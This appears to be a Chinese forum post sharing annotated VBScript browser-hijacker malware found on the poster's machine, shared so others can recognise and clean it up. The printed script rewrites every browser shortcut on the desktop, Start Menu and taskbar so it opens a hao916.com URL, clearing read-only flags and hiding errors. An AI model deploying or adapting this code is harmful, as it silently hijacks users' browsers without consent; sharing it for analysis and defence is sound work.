搬砖酱
' Sample as posted: a VBScript that rewrites browser shortcuts so they open a fixed URL.
' It walks a fixed list of folders, reads every .lnk file in each one, and when the
' shortcut's target file name is in the browser list below it replaces the shortcut's
' Arguments with the URL and saves the shortcut.
' NOTE(review): the accompanying post says the script was found with WMI tools, which
' suggests it was stored in and launched from WMI. If so, that entry has to be removed
' before the shortcuts are cleaned, or they will be rewritten - confirm on the host.
' Runtime errors are suppressed for the whole script, so a shortcut it cannot read or
' write is skipped without any message.
- On Error Resume Next
' URL written into the Arguments field of matching shortcuts; a useful indicator when
' auditing .lnk files.
- Const link = "http://hao916.com/?r=xlrnmdebjmxx&m=d5"
' Variant of the same URL (extra "&s=3") used only for shortcuts that target 360se.exe.
- Const link360 = "http://hao916.com/?r=xlrnmdebjmxx&m=d5&s=3"
' Executable names treated as browsers. Matching is on the target's file name only,
' not on its folder.
- browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
' Folders whose shortcuts are inspected: public and per-user desktop, Start Menu
' programs, Quick Launch and the pinned Start Menu / taskbar folders. The paths are
' absolute and name one user profile ("tulip"), presumably filled in for the affected
' machine - confirm.
- lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\tulip\Desktop,C:\Users\tulip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\tulip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\tulip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\tulip\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
' Lookup table keyed by the lower-cased executable name, so the later test is
' case-insensitive.
- browsersArr = Split(browsers,",")
- Set oDic = CreateObject("scripting.dictionary")
- For Each browser In browsersArr
- oDic.Add LCase(browser), browser
- Next
' Second dictionary holding the folder paths (key and value are the same string);
' the main loop iterates over it.
- lnkpathsArr = Split(lnkpaths,",")
- Set oFolders = CreateObject("scripting.dictionary")
- For Each lnkpath In lnkpathsArr
- oFolders.Add lnkpath, lnkpath
- Next
' fso is used for folder/file enumeration and path parsing, WshShell to open shortcuts.
- Set fso = CreateObject("Scripting.Filesystemobject")
- Set WshShell = CreateObject("Wscript.Shell")
- For Each oFolder In oFolders
' Folders that do not exist on this machine are skipped.
- If fso.FolderExists(oFolder) Then
' Only files directly inside the folder are enumerated; subfolders are not visited.
- For Each file In fso.GetFolder(oFolder).Files
- If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
' Calling CreateShortcut on an existing .lnk loads its current properties.
- Set oShellLink = WshShell.CreateShortcut(file.Path)
- path = oShellLink.TargetPath
' Rebuild "name.ext" of the shortcut target for the lookup in oDic.
- name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
- If oDic.Exists(LCase(name)) Then
' The assignment overwrites the Arguments field and the previous value is not kept
' anywhere, so a cleanup cannot restore it from the shortcut; it can only clear or
' reset the field.
- If LCase(name) = LCase("360se.exe") Then
- oShellLink.Arguments = link360
- Else
- oShellLink.Arguments = link
- End If
' Attribute bit 1 is read-only in the FileSystemObject model. It is cleared before the
' save, so marking a shortcut read-only does not protect it from this script.
- If file.Attributes And 1 Then
- file.Attributes = file.Attributes - 1
- End If
' Writes the modified shortcut back to disk.
- oShellLink.Save
- End If
- End If
- Next
- End If
- Next
今天发现主页被恶意篡改，于是下载 wmi_tools 进行清理，发现了如下恶意代码，贴上来供大家参考。它的做法几乎就是目录遍历：修改所有已知浏览器的快捷方式，给快捷方式添加 hao916 站点的参数。把恶意软件的 VBS 源码发出来，大家看了之后防范和清理也就更加方便了。话说有没有高手能参照这段代码写一个反向去除这些参数的脚本？个人还在研究中，共同学习吧。